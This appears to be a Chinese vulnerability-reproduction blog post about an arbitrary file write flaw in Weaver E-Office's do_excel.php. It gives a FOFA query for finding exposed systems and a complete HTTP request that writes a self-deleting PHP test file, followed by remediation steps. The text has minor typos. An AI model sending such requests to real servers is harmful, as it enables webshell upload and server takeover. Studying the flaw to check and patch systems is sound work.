当前位置: 首页 > news >正文

【漏洞复现】泛微OA E-Office do_excel.php 任意文件写入漏洞


》》》产品描述《《《

        泛微0-0fice是一款标准化的协同 OA办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。


》》》漏洞描述《《《

        泛微OAE-Ofice do exce.php 口存在任意文件写入漏洞。由于该接口未对上传文件的路径和名称进行有效校验,攻击者可以通过构造特定的请求,将任意文件写入到服务器的指定位置。攻击者利用该漏洞上传恶意文件,如 WebShel 或系统脚本,从而在服务器上执行任意命令,访问敏感数据,甚至完全接管服务器。此漏洞严重威胁系统安全,可导致数据泄露、权限提升以及业务系统瘫痪等严重后果。


》》》搜索语句《《《

app="泛微-EOffice"



》》》漏洞复现《《《

POST /general/charge/charge_list/do_excel.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Content-Length: 44
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
Connection: keep-alivehtml=<?php echo md5("1");unlink(__FILE__);?>

测试文件地址:/general/charge/charge list/excel.php
如果能解析php代码则存在漏洞


》》》修复建议《《《

1、如非必要,禁止公网访问该系统。
2、通过防火墙等安全设备设置访问策略,设置白名单访问。
3、升级产品到最新版本


-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

更多最新0day/1day POC&EXP移步----->Kelichen1113/POC-EXP (github.com)

-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------


http://www.mrgr.cn/news/40552.html

相关文章:

  • 编码能力提升计划 - 华为OD统一考试(E卷)
  • C++入门基础 (超详解)
  • Trilium Notes笔记本地化部署与简单使用指南打造个人知识库
  • Spring Boot与足球青训后台系统的协同
  • IPv4与TCP数据包结构解析
  • 计算机视觉(CV)技术的优势和挑战
  • 2024北京市赛 A.不要玩弄字符串
  • 【DCGAN 生成漫画头像】
  • 拥抱可持续创新,数据驱动未来——The Open Group 2024生态系统架构·可持续发展年度大会盛情邀约
  • ubuntu 24.04如何分配内存
  • 对个人来说,炒股有赚钱的吗,个人炒股真能赚到钱吗
  • TIM(Timer)定时器的原理
  • C语言进阶【8】--联合体和枚举(联合体和枚举这么好用,你不想了解一下吗?)
  • 为啥数据需转换成tensor才能参与后续建模训练
  • 基于JAVA+SpringBoot+Vue的社区养老服务平台
  • 力扣10.1
  • 点可云ERP进销存V8版本—其他入库单的操作使用及各单据状态说明
  • 社区医院信息管理:SpringBoot开发指南
  • 书生大模型全链路开源开放体系
  • Spring中bean对象带参数注入的三种方式以及Spring框架找不到bean xml:FileNotFoundException问题